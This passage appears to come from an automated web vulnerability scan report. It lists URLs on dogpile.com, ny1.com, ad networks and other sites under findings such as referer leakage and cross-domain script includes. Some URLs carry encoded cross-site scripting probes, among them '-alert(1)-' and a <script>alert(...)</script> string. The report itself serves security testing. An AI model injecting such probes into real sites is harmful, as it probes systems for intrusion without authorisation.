7.2. http://community.dogpile.com/

7.3. http://dogpile.com/

7.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

7.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

7.6. http://event.adxpose.com/event.flow

7.7. http://support.dogpile.com/pressroom/

7.8. http://www.888.com/favicon.ico

7.9. http://www.adleaf.com/favicon.ico

7.10. http://www.cambridge.org/uk/date/writeYear_js.asp

7.11. http://www.dogpile.com/

7.12. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1

7.13. http://www.dogpile.com/clickserver/_iceUrlFlag=1

7.14. http://www.dogpile.com/dogpile/ws/about/

7.15. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

7.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

7.17. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

7.18. http://www.dogpile.com/dogpile/ws/faq/

7.19. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

7.20. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11

7.21. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

7.22. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

7.23. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

7.24. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

7.25. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

7.26. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

7.27. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

7.28. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

7.29. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

7.30. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

7.31. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

7.32. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

7.33. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

7.34. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

7.35. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

7.36. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

7.37. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

7.38. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

7.39. http://www.dogpile.com/dogpile_other/ws/index

7.40. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

7.41. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

7.42. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

7.43. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

7.44. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

7.45. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

7.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

7.47. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

7.48. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

7.49. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

7.50. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

7.51. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

7.52. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11

7.53. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

7.54. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

7.55. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

7.56. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

7.57. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

7.58. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11

7.59. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

7.60. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11

7.61. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes

7.62. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant

7.63. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule

7.64. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

7.65. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

7.66. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

7.67. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

7.68. http://www.dogpile.com/dogpile_rss/ws/index/

7.69. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

7.70. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

7.71. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

7.72. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11

7.73. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

7.74. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11

7.75. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11

7.76. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

7.77. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

7.78. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

7.79. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

7.80. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

7.81. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

7.82. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

7.83. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

7.84. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11

7.85. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

7.86. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

7.87. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

7.88. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

7.89. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

7.90. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

7.91. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

7.92. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

7.93. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

7.94. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

7.95. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

7.96. http://www.gospel.com/favicon.ico

7.97. http://www.hughesnetpower.com/favicon.ico

7.98. http://www.mappoint.net/favicon.ico

7.99. http://www.mercantila-checkout.com/setcookie.js

7.100. http://www.mercantila.com/

7.101. http://www.myjobprospects.com/favicon.ico

7.102. http://a.collective-media.net/adj/ns.androidtapp/general

7.103. http://ad.amgdgt.com/ads/

7.104. http://ad.yieldmanager.com/pixel

7.105. http://ad.yieldmanager.com/unpixel

7.106. http://b.scorecardresearch.com/b

7.107. http://b.scorecardresearch.com/p

7.108. http://bh.contextweb.com/bh/set.aspx

7.109. http://cf.addthis.com/red/p.json

7.110. http://leadback.advertising.com/adcedge/lb

7.111. http://mm.chitika.net/minimall

7.112. http://pixel.33across.com/ps/

7.113. http://pixel.fetchback.com/serve/fb/pdc

7.114. http://pixel.quantserve.com/pixel

7.115. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.116. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.117. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.118. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.119. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.120. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.121. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.122. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.123. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.124. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.125. http://safebrowsing.clients.google.com/safebrowsing/downloads

7.126. http://syndication.mmismm.com/tntwo.php

7.127. http://tags.bluekai.com/site/2045

7.128. http://tags.bluekai.com/site/2731

7.129. http://view.c3metrics.com/c3VTabstrct-6-2.php

7.130. http://www.allgetaways.com/favicon.ico

7.131. http://www.amway.com/favicon.ico

7.132. http://www.androidtapp.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php

7.133. http://www.androidtapp.com/wp-login.php

7.134. http://www.battleofthecheetos.com/favicon.ico

7.135. http://www.belkin.com/favicon.ico

7.136. http://www.betus.com/favicon.ico

7.137. http://www.billoreilly.com/favicon.ico

7.138. http://www.blacksingles.com/favicon.ico

7.139. http://www.bluefly.com/favicon.ico

7.140. http://www.boardgamegeek.com/favicon.ico

7.141. http://www.bradsdeals.com/favicon.ico

7.142. http://www.cancercenter.com/favicon.ico

7.143. http://www.capella.edu/favicon.ico

7.144. http://www.caring4cancer.com/favicon.ico

7.145. http://www.chasefreedomnow.com/favicon.ico

7.146. http://www.cheapostay.com/favicon.ico

7.147. http://www.clearcontests.com/favicon.ico

7.148. http://www.csi-tracking.com/favicon.ico

7.149. http://www.dailydealfetcher.com/

7.150. http://www.deviceanywhere.com/favicon.ico

7.151. http://www.dmvnow.com/exec/common/VitaHeader-Redesign.css

7.152. http://www.dmvnow.com/exec/common/dmvnow2.css

7.153. http://www.dmvnow.com/exec/common/dmvprint.css

7.154. http://www.dmvnow.com/exec/common/textsizer.js

7.155. http://www.dmvnow.com/favicon.ico

7.156. http://www.dmvnow.com/images/aboutus_off.gif

7.157. http://www.dmvnow.com/images/aboutus_on.gif

7.158. http://www.dmvnow.com/images/ads/11042.jpg

7.159. http://www.dmvnow.com/images/ads/11092.jpg

7.160. http://www.dmvnow.com/images/ads/11134.jpg

7.161. http://www.dmvnow.com/images/ads/11153.jpg

7.162. http://www.dmvnow.com/images/ads/11190.jpg

7.163. http://www.dmvnow.com/images/ads/11216.jpg

7.164. http://www.dmvnow.com/images/breadcrumbcenter.jpg

7.165. http://www.dmvnow.com/images/citserv_on.gif

7.166. http://www.dmvnow.com/images/common_feel_bg.jpg

7.167. http://www.dmvnow.com/images/commserv_on.gif

7.168. http://www.dmvnow.com/images/contactus_off.gif

7.169. http://www.dmvnow.com/images/contactus_on.gif

7.170. http://www.dmvnow.com/images/dmv2.jpg

7.171. http://www.dmvnow.com/images/dmv3.jpg

7.172. http://www.dmvnow.com/images/dmv4.jpg

7.173. http://www.dmvnow.com/images/dmv7b.jpg

7.174. http://www.dmvnow.com/images/dmv8b.jpg

7.175. http://www.dmvnow.com/images/dmvcontent11.jpg

7.176. http://www.dmvnow.com/images/dmvgeneral1.jpg

7.177. http://www.dmvnow.com/images/dmvhome9.jpg

7.178. http://www.dmvnow.com/images/dmvhome_on.gif

7.179. http://www.dmvnow.com/images/dmvnow.jpg

7.180. http://www.dmvnow.com/images/forms_on.gif

7.181. http://www.dmvnow.com/images/geninfo_on.gif

7.182. http://www.dmvnow.com/images/go_ball.gif

7.183. http://www.dmvnow.com/images/icon_email.gif

7.184. http://www.dmvnow.com/images/icon_printergif.gif

7.185. http://www.dmvnow.com/images/moving_on.gif

7.186. http://www.dmvnow.com/images/officelocations_off.gif

7.187. http://www.dmvnow.com/images/officelocations_on.gif

7.188. http://www.dmvnow.com/images/online_on.gif

7.189. http://www.dmvnow.com/images/peak2000.jpg

7.190. http://www.dmvnow.com/images/resources_on.gif

7.191. http://www.dmvnow.com/images/se.gif

7.192. http://www.dmvnow.com/images/sitemap_off.gif

7.193. http://www.dmvnow.com/images/sitemap_on.gif

7.194. http://www.dmvnow.com/images/sw.gif

7.195. http://www.dmvnow.com/images/tanline.jpg

7.196. http://www.dmvnow.com/images/virginia_dot_gov_logo.jpg

7.197. http://www.dmvnow.com/images/virginia_seach_button-bg.jpg

7.198. http://www.dmvnow.com/images/virginia_seach_txt-bg.jpg

7.199. http://www.dmvnow.com/images/wcag1A.gif

7.200. http://www.dmvnow.com/images/webfeed.png

7.201. http://www.dogtimemedia.com/favicon.ico

7.202. http://www.driversed.com/favicon.ico

7.203. http://www.focusonthefamily.com/favicon.ico

7.204. http://www.guthy-renker-store.com/favicon.ico

7.205. http://www.heavygames.com/favicon.ico

7.206. http://www.jobtarget.com/favicon.ico

7.207. http://www.jpcycles.com/favicon.ico

7.208. http://www.kraftbrands.com/favicon.ico

7.209. http://www.lookupanyone.com/favicon.ico

7.210. http://www.membershiprewards.com/favicon.ico

7.211. http://www.mychasecreditcards.com/favicon.ico

7.212. http://www.nielsen.com/favicon.ico

7.213. http://www.nwf.org/favicon.ico

7.214. http://www.owners.com/favicon.ico

7.215. http://www.peopletopeople.com/favicon.ico

7.216. http://www.personalizationmall.com/favicon.ico

7.217. http://www.progressiveagent.com/favicon.ico

7.218. http://www.rambler.ru/favicon.ico

7.219. http://www.rcuniverse.com/favicon.ico

7.220. http://www.richard-group.com/favicon.ico

7.221. http://www.savingssavy.info/favicon.ico

7.222. http://www.sba.gov/favicon.ico

7.223. http://www.superherohype.com/favicon.ico

7.224. http://www.thebreastcancersite.com/favicon.ico

7.225. http://www.venus.com/favicon.ico

7.226. http://www.volunteermatch.org/favicon.ico

7.227. http://www.wpbf.com/favicon.ico

7.228. http://www.wyndham.com/favicon.ico

7.229. http://www.zoomshare.com/favicon.ico

8. Password field with autocomplete enabled

8.1. http://ecards.myfuncards.com/myfuncards/404

8.2. http://www.androidtapp.com/wp-login.php

9. Referer-dependent response

10. Cross-domain POST

11. Cross-domain Referer leakage

11.1. http://ad.amgdgt.com/ads/

11.2. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2

11.3. http://cim.meebo.com/cim/init.php

11.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

11.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

11.6. http://googleads.g.doubleclick.net/pagead/ads

11.7. http://googleads.g.doubleclick.net/pagead/ads

11.8. http://googleads.g.doubleclick.net/pagead/ads

11.9. http://googleads.g.doubleclick.net/pagead/ads

11.10. http://googleads.g.doubleclick.net/pagead/ads

11.11. http://ib.adnxs.com/ab

11.12. http://investor.infospaceinc.com/phoenix.zhtml

11.13. http://manhattan.ny1.com/Content/ServeContent.aspx

11.14. http://manhattan.ny1.com/Content/ServeContent.aspx

11.15. http://manhattan.ny1.com/Content/ServeContent.aspx

11.16. http://manhattan.ny1.com/Content/ServeContent.aspx

11.17. http://manhattan.ny1.com/Content/ServeContent.aspx

11.18. http://manhattan.ny1.com/Content/ServeContent.aspx

11.19. http://manhattan.ny1.com/Content/ServeContent.aspx

11.20. http://manhattan.ny1.com/Content/ServeContent.aspx

11.21. http://www.beatthetraffic.com/widgets/traveltimes.aspx

11.22. http://www.cambridge.org/uk/404_error.asp

11.23. http://www.dogpile.com/clickserver/_iceUrlFlag=1

11.24. http://www.dogpile.com/clickserver/_iceUrlFlag=1

11.25. http://www.dogpile.com/clickserver/_iceUrlFlag=1

11.26. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

11.27. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

11.28. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

11.29. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

11.30. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

11.31. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

11.32. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

11.33. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

11.34. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

11.35. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

11.36. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

11.37. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

11.38. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

11.39. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

11.40. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

11.41. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

11.42. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

11.43. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

11.44. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

11.45. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

11.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

11.47. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

11.48. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

11.49. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

11.50. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

11.51. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

11.52. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

11.53. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

11.54. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

11.55. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

11.56. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

11.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

11.58. http://www.dogpile.com/dogpile_rss/ws/index/

11.59. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

11.60. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

11.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

11.62. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

11.63. http://www.ny1.com/Content/ServeContent.aspx

11.64. http://www.ny1.com/Content/ServeContent.aspx

11.65. http://www.ny1.com/Content/ServeContent.aspx

11.66. http://www.ny1.com/Content/ServeContent.aspx

11.67. http://www.ny1.com/Content/ServeContent.aspx

11.68. http://www.ny1.com/Content/ServeContent.aspx

11.69. http://www.ny1.com/Content/ServeContent.aspx

11.70. http://www.ny1.com/Content/ServeContent.aspx

11.71. http://www.ny1.com/favicon.ico

11.72. http://www.quickyellow.com/includes/all.topcategories.cfm

12. Cross-domain script include

12.1. http://ad.amgdgt.com/ads/

12.2. http://cim.meebo.com/cim/init.php

12.3. http://dogpile.com/

12.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

12.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

12.6. http://ecards.myfuncards.com/myfuncards/404

12.7. http://googleads.g.doubleclick.net/pagead/ads

12.8. http://googleads.g.doubleclick.net/pagead/ads

12.9. http://investor.infospaceinc.com/phoenix.zhtml

12.10. http://manhattan.ny1.com/App_Skins/News1/Scripts/functions.js

12.11. http://manhattan.ny1.com/Content/ServeContent.aspx

12.12. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.13. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.14. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.15. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.16. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.17. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.18. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.19. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.20. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.21. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.22. http://s.aeriagames.com/misc/ads/error_banner_en.html

12.23. http://www.2theadvocate.com/favicon.ico

12.24. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

12.25. http://www.beatthetraffic.com/widgets/traveltimes.aspx

12.26. http://www.cambridge.org/uk/catalogue/viewBasket.asp

12.27. http://www.carolwrightgifts.com/favicon.ico

12.28. http://www.clairol.com/favicon.ico

